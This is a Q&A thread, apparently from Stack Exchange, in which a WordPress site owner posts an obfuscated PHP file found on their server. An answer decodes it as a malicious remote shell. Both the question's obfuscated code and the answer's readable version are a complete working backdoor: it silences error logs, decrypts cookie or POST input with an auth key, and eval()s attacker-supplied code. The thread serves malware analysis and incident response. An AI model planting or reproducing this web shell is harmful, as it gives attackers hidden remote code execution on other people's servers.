26

I found a new file in my WP root folder and contains this text:

<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["jd\x67f\x6f\x77\x6a"]="\x64\x61\x74\x61\x5f\x6bey";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["c\x63\x78\x72\x6e\x73w\x72\x78\x68"]="\x64\x61\x74\x61";${"\x47\x4c\x4fB\x41L\x53"}["gljjdjxq\x74e"]="\x64a\x74\x61";$hdhravkt="d\x61\x74a";${"\x47\x4c\x4f\x42A\x4c\x53"}["o\x74\x7a\x71\x71l\x6a"]="\x76al\x75e";${"\x47L\x4f\x42\x41\x4cS"}["pvvl\x67\x63\x68"]="a\x75\x74\x68";${"\x47L\x4f\x42A\x4cS"}["m\x70\x71\x6e\x63if\x6b\x65mn"]="\x6b\x65y";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x71\x65\x6fs\x70\x70\x62i"]="\x6a";${"\x47\x4cO\x42\x41LS"}["\x6b\x6db\x68i\x66\x62"]="\x69";${"\x47\x4c\x4fB\x41\x4cS"}["\x77mu\x70wx\x62\x65\x6am"]="\x6fut_\x64\x61\x74\x61";@ini_set("\x65rro\x72\x5f\x6c\x6fg",NULL);@ini_set("\x6c\x6fg\x5fer\x72\x6f\x72s",0);@ini_set("max\x5fexe\x63\x75t\x69\x6f\x6e\x5ft\x69\x6d\x65",0);${"G\x4cOB\x41L\x53"}["n\x6b\x6a\x70\x65\x76f\x6cy\x79"]="\x64\x61\x74\x61\x5f\x6b\x65\x79";$orxtlbuxdn="\x64\x61t\x61";@set_time_limit(0);if(!defined("P\x48\x50_\x45\x4fL")){define("P\x48P\x5f\x45OL","\n");}$cfusxjrfhr="va\x6cue";if(!defined("D\x49\x52ECT\x4f\x52\x59_SE\x50A\x52\x41\x54\x4fR")){define("DI\x52\x45\x43\x54\x4f\x52Y_S\x45\x50\x41RATO\x52","/");}${$orxtlbuxdn}=NULL;$scrxtpm="d\x61\x74\x61";${${"\x47\x4c\x4fB\x41L\x53"}["\x6ek\x6a\x70\x65vf\x6c\x79\x79"]}=NULL;$GLOBALS["\x61uth"]="4ef6\x33\x61\x62e-\x31\x61\x62d-\x34\x35\x61\x36-913d-6\x66\x62\x399\x36\x357\x65\x32\x34b";global$auth;${"G\x4cO\x42AL\x53"}["\x67\x71c\x71\x69\x61gtkd"]="\x61\x75\x74\x68";function sh_decrypt_phase($data,$key){$lougpr="i";${"G\x4c\x4fB\x41\x4c\x53"}["\x78\x79\x75\x6b\x73\x79\x6e\x6b\x73"]="\x64a\x74\x61";${${"G\x4cO\x42\x41\x4cS"}["w\x6d\x75p\x77\x78b\x65\x6a\x6d"]}="";for(${${"\x47LO\x42A\x4cS"}["\x6b\x6d\x62\x68\x69\x66\x62"]}=0;${$lougpr}<strlen(${${"\x47L\x4fBAL\x53"}["x\x79\x75\x6b\x73\x79\x6e\x6bs"]});){${"\x47\x4c\x4f\x42\x41LS"}["ni\x6dz\x78\x6c"]="\x6a";$jplufmtpaem="i";$dxzvtliuv="da\x74\x61";for(${${"\x47LO\x42ALS"}["\x6d\x71\x65\x6fs\x70p\x62\x69"]}=0;${${"\x47L\x4fB\x41\x4cS"}["m\x71\x65\x6f\x73\x70\x70bi"]}<strlen(${${"\x47\x4cOB\x41L\x53"}["\x6dpq\x6e\x63\x69\x66\x6b\x65\x6d\x6e"]})&&${${"GLO\x42\x41LS"}["k\x6d\x62\x68\x69\x66b"]}<strlen(${$dxzvtliuv});${${"G\x4c\x4f\x42AL\x53"}["\x6ei\x6d\x7a\x78\x6c"]}++,${$jplufmtpaem}++){${"\x47L\x4f\x42\x41\x4c\x53"}["wf\x6c\x79\x6eh\x75\x6c\x72\x72"]="\x6f\x75\x74_\x64\x61\x74\x61";${"\x47LO\x42\x41\x4cS"}["pcnb\x79\x71s\x63\x74\x61\x6f"]="\x64\x61\x74\x61";$kslqcnjzpl="j";${${"\x47\x4c\x4f\x42\x41LS"}["wf\x6c\x79\x6eh\x75l\x72\x72"]}.=chr(ord(${${"GLO\x42A\x4c\x53"}["\x70\x63\x6eb\x79q\x73c\x74a\x6f"]}[${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6b\x6d\x62\x68i\x66b"]}])^ord(${${"\x47LO\x42A\x4c\x53"}["\x6dp\x71n\x63\x69\x66\x6b\x65\x6d\x6e"]}[${$kslqcnjzpl}]));}}return${${"\x47\x4c\x4f\x42\x41\x4cS"}["wmu\x70\x77\x78\x62\x65j\x6d"]};}function sh_decrypt($data,$key){$zhjqnlijbf="\x6b\x65\x79";$rmzkqwtkh="\x64\x61\x74a";global$auth;return sh_decrypt_phase(sh_decrypt_phase(${$rmzkqwtkh},${${"\x47\x4cO\x42\x41\x4c\x53"}["pv\x76\x6cg\x63\x68"]}),${$zhjqnlijbf});}foreach($_COOKIE as${${"\x47\x4cO\x42A\x4c\x53"}["\x6d\x70q\x6e\x63i\x66\x6b\x65m\x6e"]}=>${$cfusxjrfhr}){${"\x47L\x4f\x42\x41\x4cS"}["\x72\x72\x6fv\x74\x68\x66b\x77\x63"]="\x64a\x74\x61";$xlaknbhqsh="d\x61\x74\x61\x5f\x6b\x65\x79";${${"G\x4c\x4f\x42AL\x53"}["r\x72ovt\x68f\x62\x77\x63"]}=${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6f\x74z\x71\x71\x6c\x6a"]};${$xlaknbhqsh}=${${"\x47\x4c\x4f\x42AL\x53"}["mp\x71n\x63i\x66k\x65\x6d\x6e"]};}if(!${$scrxtpm}){${"\x47L\x4f\x42AL\x53"}["a\x63\x69p\x66\x72\x69i"]="\x76\x61l\x75\x65";foreach($_POST as${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6d\x70\x71\x6e\x63i\x66\x6b\x65m\x6e"]}=>${${"\x47\x4cOB\x41\x4cS"}["a\x63\x69p\x66\x72\x69i"]}){${"\x47L\x4fB\x41\x4c\x53"}["m\x67b\x70yu\x78\x61"]="\x64a\x74a\x5fk\x65\x79";${"G\x4cOBAL\x53"}["\x64r\x6awk\x67\x68g"]="ke\x79";${${"\x47\x4c\x4fB\x41\x4cS"}["cc\x78\x72\x6e\x73\x77rx\x68"]}=${${"\x47\x4cO\x42\x41LS"}["o\x74\x7a\x71q\x6cj"]};${${"\x47\x4c\x4fB\x41L\x53"}["\x6d\x67\x62\x70\x79\x75\x78\x61"]}=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["dr\x6awk\x67\x68\x67"]};}}${${"\x47L\x4fB\x41\x4cS"}["\x63\x63\x78\x72\x6e\x73w\x72\x78\x68"]}=@unserialize(sh_decrypt(@base64_decode(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x63\x63\x78\x72\x6esw\x72x\x68"]}),${${"G\x4c\x4f\x42A\x4c\x53"}["\x6a\x64\x67f\x6f\x77j"]}));if(isset(${${"\x47\x4c\x4f\x42\x41L\x53"}["g\x6c\x6aj\x64\x6a\x78\x71\x74\x65"]}["a\x6b"])&&${${"\x47\x4c\x4f\x42A\x4cS"}["\x67\x71cqi\x61gt\x6b\x64"]}==${$hdhravkt}["\x61k"]){$efxgmzy="\x64\x61\x74\x61";if(${${"G\x4cO\x42\x41\x4c\x53"}["\x63\x63xr\x6es\x77rx\x68"]}["\x61"]=="\x69"){${${"G\x4cOBA\x4c\x53"}["k\x6d\x62\x68\x69\x66\x62"]}=Array("\x70\x76"=>@phpversion(),"\x73\x76"=>"1\x2e0-\x31",);echo@serialize(${${"\x47\x4cO\x42A\x4c\x53"}["k\x6d\x62h\x69\x66b"]});}elseif(${$efxgmzy}["\x61"]=="e"){${"\x47\x4cO\x42\x41\x4c\x53"}["g\x6c\x6eew\x69\x6b\x61"]="\x64at\x61";eval(${${"G\x4c\x4f\x42A\x4cS"}["\x67\x6c\x6e\x65wi\x6b\x61"]}["d"]);}}
?>

What is this?

Joci93
  • 671
  • 7
  • 10
  • 63
    Whenever you find a PHP file on your webserver you didn't put there, you know you have a serious security problem. – Philipp Jul 03 '15 at 12:13
  • 1
    @Philipp: or a colleague who finger-fumbled and scp'd to the wrong box. Granted not in this case. – Steve Jessop Jul 03 '15 at 23:39
  • 21
    @Philipp - Whenever you find PHP on your webserver, you have a serious security problem. /snark – Fake Name Jul 04 '15 at 04:06
  • OP has not responded. I am guessing there is a lot of clean up to do. Hopefully it was just a shared server and only affected one account. – Jared Burrows Jul 05 '15 at 00:58
  • I object that this is too brought. IMHO this is a very valid and precise question. And the answer is really good and very precise, too. – Axel Beckert Sep 17 '18 at 18:35

1 Answers1

48

It's a malicious remote shell. This is the decoded version:

<?php
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$data = NULL;
$data_key = NULL;
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
global $auth;

function sh_decrypt_phase($data, $key) {
    $out_data = "";
    for ($i = 0; $i < strlen($data) {
        $jplufmtpaem = "i";
        for ($j = 0;$j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }
    return $out_data;
}

function sh_decrypt($data, $key) {
    global $auth;
    return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key);
}

foreach($_COOKIE as $key => $value) {
    $data = $value;
    $data_key = $key;
}

if(!$data) {
    foreach($_POST as $key => $value) {
        $data = $value;
        $data_key = $key;
    }
}
$data = @unserialize(sh_decrypt(@base64_decode( $data ) ,  $data_key ));

if (isset($data["ak"]) && $auth == $data["ak"]) {
    if ($data["a"] == "i") {
        $i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
        echo @serialize($i);
    }
    elseif ($data["a"] == "e") {
        eval($data["d"]);
    }
}

?>

As you can see, last executed command is "eval", which executes additional script injected by its author.

Jens Erat
  • 23,816
  • 12
  • 75
  • 96
Tomasz Klim
  • 1,456
  • 12
  • 13